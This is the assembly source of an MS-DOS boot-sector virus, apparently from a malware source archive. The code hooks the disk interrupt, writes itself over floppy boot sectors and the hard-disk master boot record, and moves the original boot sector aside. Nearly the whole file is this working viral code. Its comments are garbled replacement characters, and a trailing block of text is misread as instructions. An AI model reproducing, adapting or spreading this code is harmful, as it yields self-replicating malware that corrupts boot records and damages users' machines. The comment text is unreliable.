vxug-MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.xpart.asm

		jmp	far ptr loc_2		;*(07C0:0005)
		jmp	loc_8			; (00A1)
data_27 	db	0
data_28 	dd	0F000EC59h
data_29 	dd	9F8000E4h
data_30 	dd	07C00h

;-----------------------------------------------------------------------------
;		 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> INT 13h
;-----------------------------------------------------------------------------

		push	ds
		push	ax
		cmp	ah,2			; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><>-<2D><><EFBFBD><EFBFBD><EFBFBD> <20><>
		jb	loc_3			; 2 <20><><EFBFBD> <20><>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
		cmp	ah,4			; <20><> 4 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> INT 13h
		jae	loc_3
		or	dl,dl			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> A ?
		jnz	loc_3
		xor	ax,ax			; Zero register
		mov	ds,ax
		mov	al,byte ptr ds:[43Fh]	; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
		test	al,1			; A <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		jnz	loc_3			; Jump if not zero
		call	sub_1			; <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
loc_3:
		pop	ax
		pop	ds
		jmp	cs:data_28		; (6B8E:0009=0EC59h)

;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;			       SUBROUTINE
;<3B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>

sub_1		proc	near
		push	bx
		push	cx
		push	dx			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		push	es
		push	si
		push	di
		mov	si,4
loc_4:
		mov	ax,201h
		push	cs
		pop	es
		mov	bx,200h
		xor	cx,cx			; Zero register
		mov	dx,cx
		inc	cx
		pushf
		call	cs:data_28		; <20><><EFBFBD><EFBFBD> BOOT <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		jnc	loc_5			; Jump if carry=0
		xor	ax,ax			; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		pushf				; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		call	cs:data_28		; (6B8E:0009=0EC59h)
		dec	si
		jnz	loc_4			; <20><><EFBFBD><EFBFBD><EFBFBD> 4 <20><><EFBFBD><EFBFBD><EFBFBD>
		jmp	short loc_7		; <20><><EFBFBD><EFBFBD><EFBFBD>
		nop
loc_5:
		xor	si,si			; Zero register
		mov	di,200h
		cld				; Clear direction
		push	cs
		pop	ds
		lodsw				; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		cmp	ax,[di] 		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
		jne	loc_6
		lodsw
		cmp	ax,[di+2]
		je	loc_7			; <20><><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
loc_6:
		mov	ax,301h
		mov	bx,200h 		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
		mov	cl,3
		mov	dh,1
		pushf
		call	cs:data_28
		jc	loc_7			; Jump if carry Set
		mov	ax,301h
		xor	bx,bx			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		mov	cl,1
		xor	dx,dx
		pushf
		call	cs:data_28
loc_7:
		pop	di
		pop	si
		pop	es			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		pop	dx
		pop	cx
		pop	bx
		retn
sub_1		endp

loc_8:
		xor	ax,ax			; Zero register
		mov	ds,ax
		cli				; Disable interrupts
		mov	ss,ax
		mov	sp,7C00h
		sti				;
		mov	ax,word ptr ds:[4Ch]	; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> AX <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> INT 13H
		mov	word ptr ds:[7C09h],ax	; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 9h
		mov	ax,word ptr ds:[4Eh]	; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> INT 13H
		mov	word ptr ds:[7C0Bh],ax	; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> Bh
		mov	ax,word ptr ds:[413h]	; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> 1K
		dec	ax
		dec	ax
		mov	word ptr ds:[413h],ax
		mov	cl,6
		shl	ax,cl
		mov	es,ax			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> ES <20><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
		mov	word ptr ds:[7C0Fh],ax	; <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		mov	ax,15h
		mov	word ptr ds:[4Ch],ax	; INT 13H <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 15H <20><>
		mov	word ptr ds:[4Eh],es	; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
		mov	cx,1B8h
		push	cs			;CS = 7C0h = DS
		pop	ds
		xor	si,si
		mov	di,si
		cld
		rep	movsb			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 1B8h <20><><EFBFBD><EFBFBD><EFBFBD>
		jmp	cs:data_29		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		mov	ax,0
		int	13h			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>

		xor	ax,ax			; Zero register
		mov	es,ax			; ES = AX = 00h
		mov	ax,201h 		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
		mov	bx,7C00h		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> BOOT
		cmp	cs:data_27,0		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		je	loc_9			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> Flopy disk
		mov	cx,7
		mov	dx,80h
		int	13h			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT

		jmp	short loc_12		; (014E)
		nop
loc_9:
		mov	cx,3
		mov	dx,100h
		int	13h			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT

		jc	loc_12			; Jump if carry Set
		test	byte ptr es:[46Ch],7	; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
		jnz	loc_11			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		mov	si,189h 		;
		push	cs
		pop	ds
loc_10:
		lodsb				; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		or	al,al
		jz	loc_11			; <20><><EFBFBD> <20><> <20> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		mov	ah,0Eh
		mov	bh,0
		int	10h			; Video display   ah=functn 0Eh
						;  write char al, teletype mode
		jmp	short loc_10		; (011D)
loc_11:
		push	cs
		pop	es
		mov	ax,201h 		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
		mov	bx,200h 		; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>
		mov	cl,1			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 200h
		mov	dx,80h
		int	13h			; Disk	dl=drive #: ah=func a2h
						;  read sectors to memory es:bx
		jc	loc_12			; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ? -> <20><><EFBFBD><EFBFBD><EFBFBD>
		push	cs
		pop	ds
		mov	si,200h
		mov	di,0
		lodsw				; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		cmp	ax,[di] 		; <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		jne	loc_13			; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
		lodsw
		cmp	ax,[di+2]
		jne	loc_13
loc_12:
		mov	cs:data_27,0		; (6B8E:0008=0)
		jmp	cs:data_30		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
loc_13:
		mov	cs:data_27,2		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
		mov	ax,301h
		mov	bx,200h 		; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 7
		mov	cx,7			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 0
		mov	dx,80h
		int	13h

		jc	loc_12			; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT
		push	cs
		pop	ds
		push	cs
		pop	es
		mov	si,3BEh 		 ; <20><><EFBFBD><EFBFBD><EFBFBD> partition table
		mov	di,1BEh
		mov	cx,242h
		rep	movsb			; Rep when cx >0 Mov [si] to es:[di]

		mov	ax,301h
		xor	bx,bx			; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
		inc	cl
		int	13h			; Disk	dl=drive #: ah=func a3h
						;  write sectors from mem es:bx
		jmp	short loc_12		; <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> BOOT

;------------------------------------------------------------------------------------------
;			<09><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
;------------------------------------------------------------------------------------------

		pop	es
		pop	cx
		db	6Fh
		jnz	$+74h			; Jump if not zero
		and	[bx+si+43h],dl
		and	[bx+di+73h],ch
		and	[bp+6Fh],ch
		ja	$+22h			; Jump if above
		push	bx
		jz	$+71h			; Jump if zero
		db	6Eh
		db	65h
		db	64h
		and	[bx],ax
		or	ax,0A0Ah
		add	[si+45h],cl
		inc	di
		inc	cx
		dec	sp
		dec	cx
		push	bx
		inc	bp
		xor	al,[bx+di]
		add	al,32h			; '2'
		add	word ptr ds:[0B00h][bx+si],ax	; (6B7E:0B00=0)
		add	ax,132h
		db	72 dup (0)